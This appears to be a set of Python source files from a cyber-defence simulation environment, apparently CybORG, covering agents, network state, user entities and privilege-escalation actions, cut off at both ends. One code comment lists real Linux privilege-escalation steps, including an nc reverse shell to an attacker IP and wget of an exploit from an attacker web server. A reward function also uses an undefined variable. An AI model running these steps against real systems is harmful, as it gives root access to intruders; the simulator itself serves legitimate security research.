            output.append(f"{attr}={v_str}")
        return "\n".join(output)

    def __eq__(self, other):
        if not isinstance(other, type(self)):
            return False

        for k, v in self.__dict__.items():
            if k not in other.__dict__:
                return False
            if v != other.__dict__[k]:
                return False
        return True



#  TODO create an image parser to check images for correctness
import yaml
import inspect


def parse_image(image_name):
    path = '/'.join(inspect.getfile(parse_image).split('/')[:-1]) + '/'
    with open(path+'images.yaml') as fIn:
        images = yaml.load(fIn, Loader=yaml.FullLoader)
    assert image_name in images
    with open(path + images[image_name]['path'] + '.yaml') as fIn:
        image = yaml.load(fIn, Loader=yaml.FullLoader)
    image = image['Test_Host']
    assert 'System info' in image
    assert 'User Info' in image
    assert 'Processes' in image
    for proc in image['Processes']:
        assert 'Username' in proc, f'not username in {proc} in image {image_name}'
        assert 'PID' in proc, f'not pid in {proc} in image {image_name}'
        assert 'PPID' in proc, f'not ppid in {proc} in image {image_name}'
        assert 'Process Name' in proc, f'not name in {proc} in image {image_name}'



from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
import random


class TestFlatFixedAgent(BaseAgent):

    def __init__(self, action_size=None, state_size=None, test_action=None, epsilon=1.0):
        self.test_action = test_action
        self.epsilon = epsilon
        self.len_obs = None

    def train(self, results):
        assert type(results.observation) is list
        for element in results.observation:
            assert type(element) is float
        if self.len_obs is None:
            self.len_obs = len(results.observation)
        assert self.len_obs == len(results.observation)

    def get_action(self, observation, action_space):
        assert type(action_space) is int
        assert type(observation) is list
        for element in observation:
            assert type(element) is float
        if self.len_obs is None:
            self.len_obs = len(observation)
        assert self.len_obs == len(observation)
        return random.choice(range(action_space))  # Assuming action_space is a list

    def end_episode(self):
        pass



# CLASSIFICATION:       UNCLASSIFIED
#
#         (c) Copyright Commonwealth of Australia 2019
#
# This work is copyright. Apart from any use permitted under the
# Copyright Act 1968, no part may be reproduced or modified by any
# process without prior written permission from the Commonwealth.
#
#  ***  FILE HEADERS AND COPYRIGHT STATEMENTS CANNOT BE REMOVED ***
#
# Direct inquiries to:
# Cyber & Electronic Warfare Division / Defence Science & Technology
#    Team Project Lead: Martin Lucas
#    e-mail Address:    Martin.Lucas@dst.defence.gov.au



# Copyright DST Group. Licensed under the MIT license.
from csle_cyborg.shared.enums import PasswordHashType
from csle_cyborg.simulator.entity import Entity
from csle_cyborg.simulator.local_group import LocalGroup


class User(Entity):
    def __init__(self, username: str, uid: int, password: str = None, password_hash: str = None,
                 password_hash_type: str = None, groups: list = None,
                 logged_in: bool = None, bruteforceable: bool = False):
        super().__init__()
        self.username = username

        self.password = password
        self.password_hash = password_hash
        self.bruteforceable = bruteforceable
        # assert type(bruteforceable) is bool
        if password_hash_type is not None:
            self.password_hash_type = PasswordHashType.parse_string(password_hash_type)
        else:
            self.password_hash_type = None
        self.groups = []
        if groups is not None:
            for group in groups:
                self.groups.append(LocalGroup(name=group.get('Group Name'), gid=group.get('GID')))
        self.logged_in = logged_in
        self.uid = uid
        self.disabled = False

    def get_state(self):
        obs = []

        if len(self.groups) > 0:
            for group in self.groups:
                observation = {"username": self.username, "password": self.password,
                               "password_hash": self.password_hash, "password_hash_type": self.password_hash_type,
                               "logged_in": self.logged_in, "group": group.name, "gid": group.ident}
                obs.append(observation)
        else:
            observation = {"username": self.username, "password": self.password, "password_hash": self.password_hash,
                           "password_hash_type": self.password_hash_type, "logged_in": self.logged_in}
            obs.append(observation)
        return obs

    def add_group(self, group: LocalGroup):
        if self.groups is None:
            self.groups = [group]
        else:
            self.groups.append(group)

    def disable_user(self):
        self.disabled = True
        return True

    def __str__(self):
        return f'{self.username}'



# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.enums import OperatingSystemType as ost
from .velociraptor_artifact_action import VelociraptorArtifactAction


class GetUsers(VelociraptorArtifactAction):
    """Gets the list of users on a host"""

    def __init__(self, session: int, agent: str, ostype: ost, hostname: str = None):

        if ostype == ost.WINDOWS:

            super().__init__(session=session,
                             hostname=hostname,
                             agent=agent,
                             artifact='Windows.Sys.Users',
                             env={},
                             flow_completion_wait_limit=90)

        elif ostype == ost.LINUX:

            super().__init__(session=session,
                             hostname=hostname,
                             agent=agent,
                             artifact='Linux.Sys.Users',
                             env={},
                             flow_completion_wait_limit=90)

        else:

            self.error(f"Unable to handle os type {ostype}")

    def sim_execute(self, state):
        raise NotImplementedError

    def parse(self, results: list, client_id: str) -> Observation:
        """Parses the results of the execute action to create an observation"""
        obs = Observation()

        if results == []:
            obs.set_success(False)
            return obs
        else:
            obs.set_success(True)

        obs.add_system_info(hostid='0', hostname=self.hostname)

        # The result is a dict with the details of the Flow that resulted from the query
        # Given the query is asynchronous, the result will need to be retrieved using
        # a flow completion query

        if 'User' in results[0]:
            for u in results:
                obs.add_user_info(hostid='0', username=u['User'])
        else:
            for u in results:
                obs.add_user_info(hostid='0', username=u['Name'])

        return obs



# Copyright DST Group. Licensed under the MIT license.
from ipaddress import IPv4Address

from csle_cyborg.shared.actions.shell_actions_folder.shell_privilege_escalation_folder.shell_privilege_escalation import ShellPrivilegeEscalation

# May want to separate this action into two actions which takes a session each in future, rather than one action that
# takes two sessions
#
# Steps to perform exploit are as follows:
# On Attacker, with current dir as root:
# cp /usr/share/exploitdb/exploits/linux/local/8572.c ~
# nano run # Enter lines:
# #! /bin/bash
# nc <Attacker IP> 4321 -e /bin/bash # Close file
# python -m SimpleHTTPServer 8080
# Open another tab:
# nc -nlvp 4321
# On PublicFacing or other target:
# cd /tmp
# wget http://<Attacker IP>:8080/run
# wget http://<Attacker IP>:8080/8572.c
# gcc 8572.c -o 8572
# cat /proc/net/netlink # copy the non-zero PID
# ./8572 <PID>
# This gives a root session through the netcat listener on Attacker
# can run > python -c 'import pty; pty.spawn("/bin/bash")' # gives TTY session
# Note if the netcat listener is run but no connection is made, the netcat listener should then be closed to end action
from csle_cyborg.shared.enums import FileType, AppProtocol
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.file import File
from csle_cyborg.simulator.state import State


class LinuxKernelPrivilegeEscalation(ShellPrivilegeEscalation):
    def __init__(self, session: int, agent: str, target_session: int):
        super().__init__(session, agent, target_session)

    def sim_execute(self, state: State):
        self.obs = Observation()
        self.obs.set_success(False)
        if self.session not in state.sessions[self.agent]:
            return self.obs
        # get hosts
        attacker_session = state.sessions[self.agent][self.session]
        user = attacker_session.user
        attacker_host = attacker_session.host

        if not attacker_session.active:
            self.obs.set_success(False)
            return self.obs

        # create run file on attacker
        run_file = File(name="run", user=attacker_session.user, path="/tmp/webserver/", file_type="nc_reverse_shell")
        attacker_session.host.files.append(run_file)

        # get file from attacker to target
        exploit_file = None
        readable = False
        for file in attacker_host.files:
            if file.file_type == FileType.UDEV141CODE:
                exploit_file = file
                readable = file.check_readable(user)
                break

        if exploit_file is None:
            self.obs.set_success(False)
            return self.obs
        if not readable:
            self.obs.set_success(False)
            return self.obs

        self.obs.add_file_info(hostid="hostid0", path=exploit_file.path, file_type=exploit_file.file_type,
                               name=exploit_file.name)

        self.run_web_server(attacker_session)

        exploit_file = self.copy_files_to_webserver(attacker_session, exploit_file)

        if self.target_session not in state.sessions[self.agent]:
            return self.obs

        target_session = state.sessions[self.agent][self.target_session]
        if not target_session.active:
            self.obs.set_success(False)
            return self.obs

        attacker_ip = None
        target_ip = None
        if attacker_session.host == target_session.host:
            attacker_ip = IPv4Address("127.0.0.1")
            target_ip = IPv4Address("127.0.0.1")
        else:
            for interface in attacker_session.host.interfaces:
                if interface.name != "lo":
                    for interface2 in target_session.host.interfaces:
                        if interface.ip_address in interface2.subnet.cidr.hosts():
                            attacker_ip = interface.ip_address
                            target_ip = interface2.ip_address
                            break

        if attacker_ip is None or target_ip is None:
            self.obs.set_success(False)
            return self.obs

        exploit_file = self.download_file(target_session, exploit_file, attacker_ip, target_ip)
        run_file = self.download_file(target_session, run_file, attacker_ip, target_ip)

        if exploit_file is None or run_file is None:
            self.obs.set_success(False)
            return self.obs

        # compile file on target
        executable_file = self.compile_file(target_session, exploit_file)

        if executable_file is None:
            self.obs.set_success(False)
            return self.obs

        nc = attacker_session.host.get_file("nc")

        # start nc listener
        local_port = 4321
        nc_process = None
        if nc is not None:
            if nc.check_executable(attacker_session.user):
                nc_process = attacker_session.host.add_process(ppid=attacker_session.process.pid,
                                                               user=attacker_session.user, program="nc",
                                                               open_ports=[{'Port': local_port, 'Application Protocol': "tcp",
                                                                     'Address': 'broadcast'}], name='nc')

        executed = False
        if executable_file.check_executable(target_session.user) and nc_process is not None:
            if run_file.check_executable(target_session.host.get_user('root')):
                new_session = state.add_session(user='root', agent=self.agent, host=target_session.host.hostname, parent=None)
                self.obs.add_session_info(hostid="hostid1", session_type="shell", timeout=0,
                                          session_id=new_session.ident, agent=self.agent)
                new_ephemeral_port = target_session.host.get_ephemeral_port()
                nc_process.connections[0]['local_address'] = attacker_ip
                nc_process.connections[0]['remote_address'] = target_ip
                nc_process.connections[0]['remote_port'] = new_ephemeral_port
                reverse_shell = {'local_port': 4444,
                                 "Application Protocol": AppProtocol,
                                 "local_address": target_ip,
                                 "remote_address": attacker_ip,
                                 "remote_port": local_port
                                 }
                target_session.process.connections.append(reverse_shell)
                self.obs.add_process(hostid="hostid0", local_port=local_port, remote_port=new_ephemeral_port,
                                     local_address=attacker_ip, remote_address=target_ip, app_protocol="tcp")
                self.obs.add_process(hostid="hostid1", local_port=new_ephemeral_port, remote_port=local_port,
                                     local_address=target_ip, remote_address=attacker_ip, app_protocol="tcp")

                executed = True

        if not executed:
            self.obs.set_success(False)
            return self.obs

        # switch user to firefart
        self.switch_user(target_session, "firefart", "password")
        self.obs.set_success(True)
        return self.obs



## The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
## Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.
import copy
from datetime import datetime
from ipaddress import IPv4Network, IPv4Address
from math import log2
from random import sample, choice
from csle_cyborg.shared.scenario import Scenario
from csle_cyborg.shared.enums import SessionType
from csle_cyborg.shared.observation import Observation
from csle_cyborg.simulator.host import Host
from csle_cyborg.simulator.process import Process
from csle_cyborg.simulator.session import Session
from csle_cyborg.simulator.subnet import Subnet


class State:
    """Simulates the Network State.

    This class contains all the data for the simulated network, including ips, subnets, hosts and sessions.
    The methods mostly modify the network state, but tend to delegate most of the work to the Host class.
    """

    def __init__(self, scenario):
        self.scenario = scenario
        self.subnet_name_to_cidr = None  # contains mapping of subnet names to subnet cidrs
        self.ip_addresses = None  # contains mapping of ip addresses to hostnames

        self.hosts = None  # contains mapping of hostnames to host objects
        self.sessions = None  # contains mapping of agent names to mapping of session id to session objects
        self.subnets = None  # contains mapping of subnet cidrs to subnet objects

        self.sessions_count = {}  # contains a mapping of agent name to number of sessions
        self._initialise_state(scenario)
        self.step = 0
        self.original_time = datetime(2020, 1, 1, 0, 0)
        self.time = copy.deepcopy(self.original_time)

    def get_true_state(self, info: dict) -> Observation:
        true_obs = Observation()
        if info is None:
            raise ValueError('None is not a valid argument for the get true state function in the State class')
        else:
            for hostname, host in self.hosts.items():
                if hostname in info:
                    if 'Processes' in info[hostname]:
                        for process in host.processes:
                            obs = process.get_state()
                            for o in obs:
                                true_obs.add_process(hostid=hostname, **o)
                    if 'Interfaces' in info[hostname]:
                        if info[hostname]['Interfaces'] == 'All':
                            for interface in host.interfaces:
                                true_obs.add_interface_info(hostid=hostname, **interface.get_state())
                        elif info[hostname]['Interfaces'] == 'IP Address':
                            for interface in host.interfaces:
                                if interface.name != 'lo':
                                    true_obs.add_interface_info(hostid=hostname, ip_address=interface.ip_address)
                        else:
                            raise NotImplementedError(f"{info[hostname]['Interfaces']} cannot be collected from state")
                    if 'Sessions' in info[hostname]:
                        if info[hostname]['Sessions'] == 'All':
                            for agent_name, sessions in host.sessions.items():
                                for session in sessions:
                                    true_obs.add_session_info(hostid=hostname,
                                                              **self.sessions[agent_name][session].get_state())
                        else:
                            agent_name = info[hostname]['Sessions']
                            if agent_name in host.sessions:
                                for session in host.sessions[agent_name]:
                                    true_obs.add_session_info(hostid=hostname,
                                                              **self.sessions[agent_name][session].get_state())
                    if 'Files' in info[hostname]:
                        for file in host.files:
                            true_obs.add_file_info(hostid=hostname, **file.get_state())
                    if 'User info' in info[hostname]:
                        for user in host.users:
                            obs = user.get_state()
                            for o in obs:
                                true_obs.add_user_info(hostid=hostname, **o)
                    if 'System info' in info[hostname]:
                        true_obs.add_system_info(hostid=hostname, **host.get_state())
                    if 'Services' in info[hostname]:
                        if 'All' in info[hostname]['Services']:
                            for service, service_info in host.services.items():
                                true_obs.add_process(hostid=hostname, service_name=service, pid=service_info['process'])
                        else:
                            for service_name in info[hostname]['Services']:
                                if service_name in host.services:
                                    true_obs.add_process(hostid=hostname, service_name=service_name,
                                                         pid=host.services[service_name]['process'])
        return true_obs

    def reset(self):
        self._initialise_state(self.scenario)
        self.step = 0
        self.time = copy.deepcopy(self.original_time)

    def _initialise_state(self, scenario: Scenario):
        self.subnet_name_to_cidr = {}  # contains mapping of subnet names to subnet cidrs
        self.ip_addresses = {}  # contains mapping of ip addresses to hostnames

        self.hosts = {}  # contains mapping of hostnames to host objects
        self.sessions = {}  # contains mapping of agent names to mapping of session id to session objects
        self.subnets = {}  # contains mapping of subnet cidrs to subnet objects

        self.sessions_count = {}  # contains a mapping of agent name to number of sessions
        hostname_to_interface = {}

        count = 0
        # randomly generate subnets cidrs for all subnets in scenario and IP addresses for all hosts in those subnets and create Subnet objects
        # using fixed size subnets (VLSM maybe viable alternative if required)
        maximum_subnet_size = max([scenario.get_subnet_size(i) for i in scenario.subnets])
        subnets_cidrs = sample(
            list(IPv4Network("10.0.0.0/16").subnets(new_prefix=32 - max(int(log2(maximum_subnet_size + 5)), 4))),
            len(scenario.subnets))
        for subnet_name in scenario.subnets:
            subnet_cidr = choice(list(subnets_cidrs[count].subnets(
                new_prefix=32 - max(int(log2(scenario.get_subnet_size(subnet_name) + 5)), 4))))
            count += 1
            self.subnet_name_to_cidr[subnet_name] = subnet_cidr
            ip_address_selection = sample(list(subnet_cidr.hosts()), len(scenario.get_subnet_hosts(subnet_name)))
            allocated = 0
            for hostname in scenario.get_subnet_hosts(subnet_name):
                self.ip_addresses[ip_address_selection[allocated]] = hostname
                interface = {"ip_address": ip_address_selection[allocated], "subnet": subnet_cidr}
                if hostname in hostname_to_interface:
                    hostname_to_interface[hostname].append(interface)
                else:
                    hostname_to_interface[hostname] = [interface]
                allocated += 1
            self.subnets[subnet_cidr] = Subnet(cidr=subnet_cidr, ip_addresses=ip_address_selection,
                                               nacls=scenario.get_subnet_nacls(subnet_name), name=subnet_name)

        # create host objects for all host names in the scenario
        for hostname in scenario.hosts:
            host_info = scenario.get_host(hostname)
            self.hosts[hostname] = Host(system_info=host_info['System info'], processes=host_info['Processes'],
                                        users=host_info['User Info'], interfaces=hostname_to_interface[hostname],
                                        hostname=hostname, info=host_info.get('info'),
                                        services=host_info.get('Services'))

        for agent in scenario.agents:
            agent_info = scenario.get_agent_info(agent)
            self.sessions[agent] = {}
            self.sessions_count[agent] = 0
            # instantiate parentless sessions first
            for starting_session in agent_info.starting_sessions:
                if starting_session.parent is None:
                    self.sessions[agent][len(self.sessions[agent])] = self.hosts[starting_session.hostname].add_session(
                        username=starting_session.username,
                        agent=agent,
                        parent=None,
                        session_type=starting_session.session_type,
                        ident=self.sessions_count[agent],
                        name=starting_session.name,
                        artifacts=starting_session.event_artifacts)
                    self.sessions_count[agent] += 1
            for starting_session in agent_info.starting_sessions:
                if starting_session.parent is not None:
                    if starting_session.parent in [i.name for i in self.sessions[agent].values()]:
                        parent = self.sessions[agent][
                            {i.name: id for id, i in self.sessions[agent].items()}[starting_session.parent]]
                    else:
                        raise ValueError(
                            f"Parent session: {starting_session.parent} of session: {starting_session} not in agent's session list")
                    self.sessions[agent][len(self.sessions[agent])] = self.hosts[starting_session.hostname].add_session(
                        username=starting_session.username,
                        agent=agent,
                        session_type=starting_session.session_type,
                        ident=self.sessions_count[agent],
                        parent=parent,
                        name=starting_session.name,
                        artifacts=starting_session.event_artifacts)
                    self.sessions_count[agent] += 1

            for host in self.hosts.values():
                host.create_backup()

    def add_session(self, host: str, user: str, agent: str, parent: int, process=None, session_type: str = "shell",
                    timeout: int = 0, is_escalate_sandbox: bool = False) -> Session:
        """Adds a session of a selected type to a dict as a selected user"""
        ident = self.sessions_count[agent]
        if parent in self.sessions[agent]:
            parent = self.sessions[agent][parent]
        self.sessions_count[agent] += 1
        new_session = self.hosts[host].add_session(username=user, ident=ident, timeout=timeout, pid=process,
                                                   session_type=session_type, agent=agent, parent=parent,
                                                   is_escalate_sandbox=is_escalate_sandbox)
        self.sessions[agent][ident] = new_session
        return new_session

    def add_file(self, host: str, name: str, path: str, user: str = None, user_permissions: str = None,
                 group: str = None, group_permissions: int = None, default_permissions: int = None):
        host = self.hosts[host]
        return host.add_file(name, path, user, user_permissions, group, group_permissions, default_permissions)

    def add_user(self, host: str = None, username: str = None, password: str = None, password_hash_type: str = None):
        host = self.hosts[host]
        return host.add_user(username=username, password=password, password_hash_type=password_hash_type)

    def remove_process(self, hostname: str, pid: int):
        host = self.hosts[hostname]
        process = host.get_process(pid)
        if process is not None:
            agent, session = self.get_session_from_pid(hostname=hostname, pid=pid)
            host.processes.remove(process)
            if process.pid in [i['process'] for i in host.services.values() if i['active']]:
                process.pid = None
                host.add_process(**process.__dict__)
                service = True
            else:
                service = False
            if session is not None:
                host.sessions[agent].remove(session)
                session = self.sessions[agent].pop(session)
                if service:
                    session_reloaded = self.add_session(host=host.hostname, user=session.user,
                                                        session_type=session.session_type, agent=session.agent,
                                                        parent=session.parent, timeout=session.timeout)

    def get_session_from_pid(self, hostname, pid):
        for agent, sessions in self.sessions.items():
            for session in sessions:
                if self.sessions[agent][session].pid == pid and self.sessions[agent][session].host == hostname:
                    return agent, session
        return None, None

    def reboot_host(self, hostname):
        host = self.hosts[hostname]
        for agent, sessions in host.sessions.items():
            for session in sessions:
                self.sessions[agent].pop(session)
                for other_session in self.sessions[agent].values():
                    if other_session.session_type == SessionType.MSF_SERVER and session in other_session.routes:
                        other_session.routes.pop(session)
        host.sessions = {}
        host.processes = []
        for file in host.files:
            if file.path == "/tmp/":
                host.files.remove(file)

        # start back up
        for process in host.default_process_info:
            process["user"] = host.get_user(process.get("Username"))
            host.processes.append(
                Process(pid=process.get('PID'), parent_pid=process.get('PPID'), username=process.get('user'),
                        process_name=process.get('Process Name'), path=process.get('Path'),
                        open_ports=process.get('Connections')))

        for servicename, service in host.services.items():
            if service['active']:
                self.start_service(hostname, servicename)

    def stop_service(self, hostname: str, service_name: str):
        # stops a service, its process, and associated sessions
        process = self.hosts[hostname].stop_service(service_name)
        self.remove_process(hostname, process)

    def start_service(self, hostname: str, service_name: str):
        # stops a service, its process, and associated sessions
        process, session = self.hosts[hostname].start_service(service_name)
        if session is not None:
            self.add_session(host=hostname, process=process, user=session.user, session_type=session.session_type,
                             agent=session.agent, parent=session.parent, timeout=session.timeout)

    def get_subnet_containing_ip_address(self, ip_address: IPv4Address) -> Subnet:
        for subnet in self.subnets.values():
            if subnet.contains_ip_address(ip_address):
                return subnet
        raise ValueError(f"No Subnet contains the ip address {ip_address}")



# The following code contains work of the United States Government and is not subject to domestic copyright protection under 17 USC § 105.
# Additionally, we waive copyright and related rights in the utilized code worldwide through the CC0 1.0 Universal public domain dedication.

"""
Handling of privilege escalation action selection and execution
"""
# pylint: disable=invalid-name
from random import choice
from abc import ABC, abstractmethod
from typing import Tuple, Optional, List
from csle_cyborg.shared.observation import Observation
from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.actions.concrete_actions.escalate_action import ExploreHost, EscalateAction
from csle_cyborg.shared.actions.concrete_actions.juicy_potato import JuicyPotato
from csle_cyborg.shared.actions.concrete_actions.v4l2_kernel_exploit import V4L2KernelExploit
from csle_cyborg.shared.enums import OperatingSystemType, TrinaryEnum
from csle_cyborg.simulator.state import State
from csle_cyborg.simulator.session import Session


# pylint: disable=too-few-public-methods
class EscalateActionSelector(ABC):
    """
    Examines the target host and returns a selected applicable escalate action
    if any, as well as processes that are required to be genuine
    """

    # pylint: disable=missing-function-docstring
    @abstractmethod
    def get_escalate_action(self, *, state: State, session: int, target_session: int,
                            agent: str, hostname: str) -> \
            Optional[EscalateAction]:
        pass


class DefaultEscalateActionSelector(EscalateActionSelector):
    """
    Attempts to use Juicy Potato if windows, otherwise V4l2 kernel
    """

    def get_escalate_action(self, *, state: State, session: int, target_session: int,
                            agent: str, hostname: str) -> \
            Optional[EscalateAction]:
        if state.sessions[agent][session].operating_system[hostname] == OperatingSystemType.WINDOWS:
            return JuicyPotato(session=session, target_session=target_session,
                               agent=agent)

        return V4L2KernelExploit(session=session, target_session=target_session,
                                 agent=agent)


_default_escalate_action_selector = DefaultEscalateActionSelector()


class PrivilegeEscalate(Action):
    """Selects and executes a privilege escalation action on a host"""

    def __init__(self, session: int, agent: str, hostname: str):
        super().__init__()
        self.agent = agent
        self.session = session
        self.hostname = hostname
        self.escalate_action_selector = _default_escalate_action_selector

    def emu_execute(self) -> Observation:
        raise NotImplementedError

    def __perform_escalate(self, state: State, sessions: List[Session]) -> Tuple[Observation, int]:
        target_session = choice(sessions)

        # print(f"""
        # Host {self.hostname} attempting escalate:
        # Session {target_session.__dict__}""")

        # test if session is in a sandbox
        if target_session.is_escalate_sandbox:
            state.remove_process(target_session.host, target_session.pid)
            return Observation(success=False), -1

        target_session_ident = target_session.ident

        sub_action = self.escalate_action_selector.get_escalate_action(
            state=state, session=self.session, target_session=target_session_ident,
            agent=self.agent, hostname=self.hostname)

        if sub_action is None:
            return Observation(success=False), -1

        return sub_action.sim_execute(state), target_session_ident

    def sim_execute(self, state: State) -> Observation:
        # find session on the chosen host
        sessions = [s for s in state.sessions[self.agent].values() if s.host == self.hostname]
        if len(sessions) == 0:
            # no valid session could be found on chosen host
            return Observation(success=False)
        # find if any session are already SYSTEM or root
        target_session = None
        obs = Observation(False)
        for sess in sessions:
            # else find if session is Admin or sudo
            if sess.username in ('root', 'SYSTEM'):
                target_session = sess.ident
                obs = Observation(success=True)
                obs.add_session_info(hostid=self.hostname, **sess.get_state())
                break
        # else use random session
        if target_session is None:
            obs, target_session = self.__perform_escalate(state, sessions)

        if obs.data['success'] is not TrinaryEnum.TRUE:
            return obs

        sub_action = ExploreHost(session=self.session, target_session=target_session,
                                 agent=self.agent)
        obs2 = sub_action.sim_execute(state)
        for host in obs2.data.values():
            try:
                host_processes = host['Processes']
                for proc in host_processes:
                    if proc.get('Service Name') == 'OTService':
                        state.sessions[self.agent][self.session].ot_service = 'OTService'
                        break
            except KeyError:
                pass
            except TypeError:
                pass

        obs.combine_obs(obs2)
        return obs

    def __str__(self):
        return f"{self.__class__.__name__} {self.hostname}"



from typing import Any

from csle_cyborg.agents.simple_agents.base_agent import BaseAgent
from csle_cyborg.shared.results import Results


class BaseWrapper:
    def __init__(self, env = None, agent: BaseAgent = None):
        # wrapper allows changes to be made to the interface between external agents via specification of the env
        self.env = env
        # wrapper allows changes to be made to the interface between internal agents via specification of the agent
        self.agent = agent

    def step(self, agent=None, action=None) -> Results:
        result = self.env.step(agent, action)
        result.observation = self.observation_change(result.observation)
        result.action_space = self.action_space_change(result.action_space)
        return result

    def reset(self, agent=None):
        result = self.env.reset(agent)
        result.action_space = self.action_space_change(result.action_space)
        result.observation = self.observation_change(result.observation)
        return result

    def get_action(self, observation: dict, action_space: dict):
        return self.agent.get_action(self.observation_change(observation), self.action_space_change(action_space))

    def train(self, result: Results):
        """Trains an agent with the new tuple from the environment"""
        result.action_space = self.action_space_change(result.action_space)
        result.observation = self.observation_change(result.observation)
        self.agent.train(result)

    def set_initial_values(self, observation: dict, action_space: dict):
        self.agent.set_initial_values(action_space, observation)

    def observation_change(self, observation: dict) -> dict:
        return observation

    def action_space_change(self, action_space: dict) -> dict:
        return action_space

    def end_episode(self):
        self.agent.end_episode()

    def get_action_space(self, agent: str) -> dict:
        return self.action_space_change(self.env.get_action_space(agent))

    def get_observation(self, agent: str):
        return self.observation_change(self.env.get_observation(agent))

    def get_last_action(self, agent: str):
        return self.env.get_last_action(agent=agent)

    def set_seed(self, seed: int):
        self.env.set_seed(seed)

    def shutdown(self, **kwargs) -> bool:
        """Shutdown CybORG

        Parameters
        ----------
        **kwargs : dict, optional
            keyword arguments to pass to environment controller shutdown
            function. See the shutdown function of the specific environment
            controller used for details.

        Returns
        -------
        bool
            True if cyborg was shutdown without issue
        """
        return self.env.shutdown(**kwargs)

    def get_attr(self, attribute: str) -> Any:
        """gets a specified attribute from this wrapper if present of requests it from the wrapped environment

                Parameters
                ----------
                attribute : str
                    name of the requested attribute

                Returns
                -------
                Any
                    the requested attribute
                """
        if hasattr(self, attribute):
            return self.__getattribute__(attribute)
        else:
            return self.env.get_attr(attribute)



# Copyright DST Group. Licensed under the MIT license.
import inspect
from pprint import pprint
from csle_cyborg.agents.simple_agents.base_agent import BaseAgent

from ipaddress import IPv4Network


class KeyboardAgent(BaseAgent):

    def __init__(self,screen_width=94):
        self.step = 1
        self.screen_width = screen_width # Sets width of the printed bars

    def get_action(self, observation, action_space, sessions=None):
        self._print_observation(observation)
        self._print_action_success(observation)

        valid_commands = self._get_valid_commands(action_space)
        command = self._choose_from_options('Command',list(valid_commands.keys()))
        action = self._select_parameters(valid_commands[command])
        
        self.step += 1
        return action

    def _print_observation(self,observation):
        print('',f' Turn {self.step}: Observation '.center(self.screen_width, '*'),'',sep='\n')
        if type(observation) == dict:
            pprint(observation)
        else:
            print(observation)

    def _print_action_success(self,observation):
        if type(observation) == dict:
            success = observation['success']
        else:
            success = observation.success

        if self.step == 1:
            pass
        elif success.value==1:
            print(self.screen_width * '-', 'Yay! The Action was a Success!', self.screen_width * '*', sep='\n')
        elif success.value == 2:
            print(self.screen_width * '-', 'Outcome of action is unknown...', self.screen_width * '*', sep='\n')
        else:
            print(self.screen_width * '-', 'The action failed!', self.screen_width * '*', sep='\n')

    def _get_valid_commands(self,action_space):
        print('',f' Turn {self.step}: Command Selection '.center(self.screen_width, '*'),'',sep='\n')
        valid_commands = {}
        for command in action_space['action'].keys():
            parameter_list = inspect.getfullargspec(command).args 
            parameter_dict = {}
            for parameter in parameter_list:
                if parameter == 'self':
                    continue
                if parameter == 'priority':
                    continue

                option_dict = action_space[parameter]
                filter_f = lambda key : option_dict[key]
                valid_options = list(filter(filter_f,option_dict.keys()))
                if not valid_options:
                    break
                parameter_dict[parameter] = valid_options

            else:
                parameter_dict['command'] = command
                valid_commands[command.__name__] = parameter_dict

        return valid_commands

    def _choose_from_options(self, name:str, options:list):
        if len(options) == 0:
            raise ValueError(f'Selecting {name} failed because there are no valid options')
        elif len(options) == 1:
            choice = options[0]
            print(f'Automatically choosing {choice} as it is the only option.')
            return choice

        for i in range(len(options)):
            print(i, options[i])

        while True:
            user_input = input(self.screen_width*'-'+f'\nCHOOSE A {name.upper()}: ')
            if user_input.isdigit():
                try:
                    choice = options[int(user_input)]
                    break
                except:
                    print('Choose a number in range.....')
            else:
                options_lower = [str(x).lower() for x in options]
                try:
                    index = options_lower.index(user_input.lower())
                    choice = options[index]
                except:
                    print(f'You didn\'t type in a valid {name}...')

        print(f'You chose {choice}.')
        return choice

    def _select_parameters(self, parameter_dict):
        print('\n')
        print(f' Turn {self.step}: Parameter Selection '.center(self.screen_width, '*'))
        print('\n')

        command = parameter_dict.pop('command')

        chosen_parameters = {}
        for parameter in parameter_dict:
            print(f' {parameter.capitalize()} Selection '.center(self.screen_width, '-'))
            choice = self._choose_from_options('Parameter',parameter_dict[parameter])
            chosen_parameters[parameter] = choice
            
        return command(**chosen_parameters)

    def train(self, results):
        # The user trains with their brain, not an API!
        pass

    def set_initial_values(self, action_space, observation):
        pass

    def end_episode(self):
        pass




# Copyright DST Group. Licensed under the MIT license.

from csle_cyborg.shared.actions.action import Action
from csle_cyborg.shared.reward_calculator import RewardCalculator

WIN_REWARD = 1
LOSE_REWARD = -1
REWARD_MAX_DECIMAL_PLACES = 3
REWARD_DIFF_SCALE_FACTOR = 1000


class BaselineRewardCalculator(RewardCalculator):
    def __init__(self, agent_name: str):
        super().__init__(agent_name)
        self.previous_diff = 0
        self.flat = True

    def calculate_reward(self, current_state: dict, action: Action, agent_observations: dict, done: bool):
        reward = 0

        if done:
            # check for win
            win = True
            for key, host in current_state.items():
                if key != "success" and isinstance(host, dict):
                    for session in host.get("Sessions", []):
                        if "Agent" in session and session["Agent"] == "Red":
                            win = False
                            break
                if not win:
                    break
            # check for win or loss
            if win:
                reward += WIN_REWARD
            else:
                reward += LOSE_REWARD

        current_diff = 0
        for i in range(len(self.init_state)):
            if self.init_state[i] != flat_fixed_state[i]:
                current_diff -= 1

        # Code for calculating reward with recursive methods.
        # Note that self.init_state will need to be an observation
        # rather than a flat fixed list for this to work
        #
        # current_diff = self.obs_diff(self.init_state.get_dict(),
        #                              current_state.get_dict())

        diff = (current_diff - self.previous_diff)
        reward += diff / REWARD_DIFF_SCALE_FACTOR
        self.previous_diff = current_diff

        self.previous_state = flat_fixed_state
        self.previous_obs = agent_observations
        self.tick()
        return round(reward, REWARD_MAX_DECIMAL_PLACES)

    # Method to find number of differences between two observations as
    # dictionaries
    def obs_diff(self, init, current):
        reward = 0
        if init == current:
            return reward
        list_init = {}
        list_current = {}
        val_init = {}
        val_current = {}
        shared_keys = []
        for k, v in current.items():
            if type(v) is dict:
                if k in init:
                    reward += self.obs_diff(init[k], current[k])
                    shared_keys.append(k)
                else:
                    reward -= 1 + self.obs_size(v)
            elif type(v) is list:
                list_current[k] = v
            else:
                val_current[k] = v
        for k, v in init.items():
            if type(v) is dict:
                if k not in shared_keys:
